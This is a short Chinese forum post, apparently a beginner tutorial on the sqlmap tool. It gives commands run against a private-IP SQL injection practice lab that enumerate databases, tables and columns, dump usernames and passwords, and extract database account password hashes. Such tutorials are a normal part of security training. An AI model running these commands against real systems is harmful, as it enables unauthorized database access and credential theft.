首页
社区
课程
招聘
[推荐]sqlmap基础使用方法
发表于: 2020-1-19 15:33 2155

[推荐]sqlmap基础使用方法

2020-1-19 15:33
2155

小白路过,大佬勿喷!!!

--batch可以不用交互默认进行


检测注入点

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1

查看所有数据库

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --dbs

查看当前数据库

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-db --batch

列出数据库中的表

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security --tables --batch

-D 指定数据库名

--tables 列出表

列出表中字段

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users --columns --batch

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users -C "username,password" --dump --batch

-C 指定的字段

--dump 将结果导出

当前数据库使用账户

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-user --batch

列出数据库所有用户

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --users --batch

获取数据库账户密码

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --passwords --batch


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2020-1-19 15:38 被xiaobaijia编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 577
活跃值: (102)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
为什么一部分图片不显示出来呢!
2020-1-19 15:39
0
游客
登录 | 注册 方可回帖
返回
//